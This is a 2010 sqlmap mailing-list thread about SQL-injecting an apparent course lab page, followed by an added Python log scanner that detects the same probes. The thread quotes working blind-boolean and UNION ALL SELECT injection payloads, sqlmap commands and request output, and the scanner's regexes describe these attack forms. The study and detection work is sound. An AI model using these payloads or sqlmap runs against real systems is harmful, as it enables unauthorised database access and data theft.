Re: [sqlmap-users] Fw: Which get was the right
From: Beatriz D. <bea...@ya...> - 2010-01-22 08:34:38
Ok, got it; now that takes me to another issue. sqlmap says that the target doesn't work with UNION:

[02:24:17] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability
[02:24:17] [INFO] confirming partial (single entry) inband sql injection on parameter 'departamento' by appending a false condition after the parameter value
[02:24:18] [TRAFFIC OUT] HTTP request:
GET /uoc/alumnos/sqlinjection/?departamento=0%20AND%203320=3321%20UNION%20ALL%20SELECT%20NULL%23%20AND%203353=3353 HTTP/1.1

But if I apply directly:

http://X.X.X.X/uoc/alumnos/sqlinjection/?departamento=0%20UNION%20ALL%20SELECT%20NULL,%20%271234%27

it works: the number 1234 is shown as part of a list. Is there a way to force sqlmap to work with UNION and avoid the testing that --use-union does?

--
I Have Learned So much from God That I can no longer Call Myself A Christian, a Hindu, a Muslim, A Buddhist, a Jew. The Truth has shared so much of Itself With me That I can no longer call myself A man, a woman, an angel Or even pure Soul. Love has Befriended Hafiz so completely It has turned to ash And freed Me Of every concept and image My mind has ever known. –Hafiz, Persian poet (1315 – 1390)

________________________________
From: Ignacio Hernández <nac...@gm...>
To: Beatriz Duran <bea...@ya...>
Sent: Thu, January 21, 2010 8:41:14 AM
Subject: Re: [sqlmap-users] Fw: Which get was the right

Ok, that's because it is a blind SQL injection. You can google it to find more info about it, but the basics are that in blind SQLi you try to figure out the result of the query char by char. For example, if the user is root, you have to first find r, then o... This is like this because in blind SQL injections the database only answers "True" or "False". So you ask the database: is the first char bigger than "a"? Then it answers yes... and so on. That's why there are so many queries, all of them needed to guess the content of the query.
On 21/01/2010 7:37, "Beatriz Duran" <bea...@ya...> wrote:

> For example, you run:
>
> sqlmap -u http://XXX.XXX.XXX.XXX/something/?departamento=0 -v 5 --sql-query "SELECT CURRENT_USER()"
>
> After the execution you find the current user:
>
> [00:11:15] [INFO] retrieved: usqli@localhost
> [00:11:15] [DEBUG] performed 112 queries in 87 seconds
> SELECT CURRENT_USER(): 'usqli@localhost'
>
> But the results say that 112 queries were tried, like:
>
> something/?departamento=0%20AND%20ORD%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%29%2C%2016%2C%201%29%29%20%3E%201%20AND%20316=316 HTTP/1.1
>
> How can I know which one of the 112 got the result?
>
> ________________________________
> From: Ignacio Hernández [mailto:nac...@gm...]
> Sent: Wednesday, 20 January 2010 06:10 p.m.
> To: Duran, Beatriz
> Subject: Re: [sqlmap-users] Which get was the right
>
>> Hi Beatriz
>>
>> When you run sqlmap against a target and one of the tests succeeds, sqlmap tells yo...
>>
>> 2010/1/20 Duran, Beatriz
>>
>>> Hi, after you ran sqlmap to get for example, the list of tables; it gives you the query applied but...
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
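The thread shows the two request shapes a defender would want to recognise in web-server logs: the boolean-based blind probes (an ORD(MID(...)) > n comparison followed by a tautology such as AND 316=316, repeated many times to recover a value char by char, hence the 112 queries for one CURRENT_USER()) and the inband UNION ALL SELECT probes. The following is an added example, not code from the thread or from the sqlmap project: a small Python scanner that parses access-log lines, percent-decodes each query parameter, classifies the value, and counts probes per client and parameter so that a burst of blind probes against one parameter stands out. The two attack request targets are copied from the thread; the log-line metadata (client address, timestamps, status codes, sizes), the benign first request and the function names are constructed for this example.

```python
"""Flag sqlmap-style SQL-injection probes in web-server access logs.

Added example for the sqlmap-users thread above; it is not code from the
thread or from the sqlmap project. The attack request targets are the ones
quoted in the thread; everything else in SAMPLE_LOG is constructed.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlparse

# Constructed access-log lines (Common Log Format). Lines 2-4 carry the
# request targets quoted in the thread; line 1 is a benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Jan/2010:00:11:14 +0100] "GET /uoc/alumnos/sqlinjection/?departamento=0 HTTP/1.1" 200 512
10.0.0.5 - - [21/Jan/2010:00:11:15 +0100] "GET /uoc/alumnos/sqlinjection/?departamento=0%20AND%20ORD%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%29%2C%2016%2C%201%29%29%20%3E%201%20AND%20316=316 HTTP/1.1" 200 512
10.0.0.5 - - [21/Jan/2010:02:24:18 +0100] "GET /uoc/alumnos/sqlinjection/?departamento=0%20AND%203320=3321%20UNION%20ALL%20SELECT%20NULL%23%20AND%203353=3353 HTTP/1.1" 200 498
10.0.0.5 - - [21/Jan/2010:02:30:00 +0100] "GET /uoc/alumnos/sqlinjection/?departamento=0%20UNION%20ALL%20SELECT%20NULL,%20%271234%27 HTTP/1.1" 200 530
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Boolean-based blind: a character test via ORD/ASCII over a substring,
# normally followed by a tautology such as "AND 316=316" (true branch).
BLIND_RE = re.compile(r"\bAND\s+(?:ORD|ASCII)\s*\(\s*(?:MID|SUBSTR|SUBSTRING)\s*\(", re.I)
TAUTOLOGY_RE = re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)
# Inband: a UNION [ALL] SELECT appended to the original query.
UNION_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)


def decode_params(target):
    """Map each query-string parameter to its percent-decoded values.

    parse_qs decodes once; the extra unquote() pass surfaces payloads that
    were percent-encoded twice, which a single decode would leave opaque.
    """
    qs = urlparse(target).query
    return {k: [unquote(v) for v in vs]
            for k, vs in parse_qs(qs, keep_blank_values=True).items()}


def classify_value(value):
    """Return 'union', 'blind-boolean' or None for one decoded parameter value."""
    if UNION_RE.search(value):
        return "union"
    if BLIND_RE.search(value) and TAUTOLOGY_RE.search(value):
        return "blind-boolean"
    return None


def scan_log(text):
    """Return one finding dict per (request, parameter) that looks injected."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not Common Log Format; skip rather than guess
        for param, values in decode_params(m["target"]).items():
            for value in values:
                kind = classify_value(value)
                if kind:
                    findings.append({"ip": m["ip"], "ts": m["ts"], "param": param,
                                     "kind": kind, "value": value})
    return findings


def probe_counts(findings):
    """Count findings per (client, parameter): a char-by-char blind extraction
    shows up as many probes against the same parameter in a short window."""
    return Counter((f["ip"], f["param"]) for f in findings)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['ip']} {f['param']}={f['value']!r}: {f['kind']}")
    for (ip, param), n in probe_counts(found).items():
        print(f"{ip} sent {n} injection probe(s) against '{param}'")
```

The classification keys on the decoded value, not on the raw URL, because the probes in the thread arrive percent-encoded and a pattern match on the raw request line would miss them. The second decode pass is a deliberate trade-off: it catches double-encoded payloads at the cost of occasionally mangling a legitimate value that contains a literal percent sign, so treat the result as a triage signal rather than a block decision. Feeding the scanner a real log would give a per-client count in the hundreds for a blind extraction like the 112-query CURRENT_USER() run in the thread.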